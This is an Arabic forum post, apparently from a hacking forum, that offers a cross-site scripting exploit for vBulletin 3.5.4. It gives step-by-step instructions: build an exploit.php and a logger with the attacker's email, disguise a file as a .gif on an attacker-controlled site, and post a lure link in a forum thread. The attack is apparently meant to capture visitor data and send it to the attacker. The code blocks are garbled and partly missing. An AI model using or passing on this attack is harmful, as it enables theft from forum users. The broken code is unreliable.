Admin صاحب الموقع
عدد الرسائل : 473 العمر : 44 تاريخ التسجيل : 23/07/2006
| موضوع: Xss Vbulletin 3.5.4 ثغرة جديدة الإثنين 14 أغسطس - 21:47 | |
| بسم الله الرحمن الرحيم
أهلا بكم اعضاء منتديات منظمة الاختراق العالمية
نقدم اليوم ثغرة من احدث ثغرات الفبيولتين
وهى Xss Vbulletin 3.5.x
مجربة على vBulletin 3.5.4
*-* طريقة الاعداد للثغرة *-*
ضع الكود التالى في ملف نوتباد ونسميه على سبيل المثال اكسبلويت بس لازم الامتداد زى ماهو: exploit.php
كود: <php> <a href="log.php"></a><xx1> <php> <php> غير < elmohaseb.net@hotmail.comالموجودة في الكود اعلاه الى ايميلك
الكود التالى حطه بنوتباد واحفظه بأمتداد gif طبعا بعد تغيير http://YOUR ADDRESS WEB.com الى اسم الموقع الي رفعت عليه ملف exploit.php
مثال ..... root.gif
كود: </pre>
الان انتهينا من التحضير
*-* طريقة التطبيق *-* 1- أضف مشاركة جديدة ومن ضمن المشاركة حط الكود التالى
كود: <a target="_blank">اكتب شئ مجذب للانتباه هنا</a> '
وارسل المشاركة ومبروك عليك
*-* شروط عمل الثغرة علشان لا حد يجى يقول الثغرة مش شغاله او فاشلة *-* تفعيل خيارات الـ html لازم يكون on بالمنتدى | |
|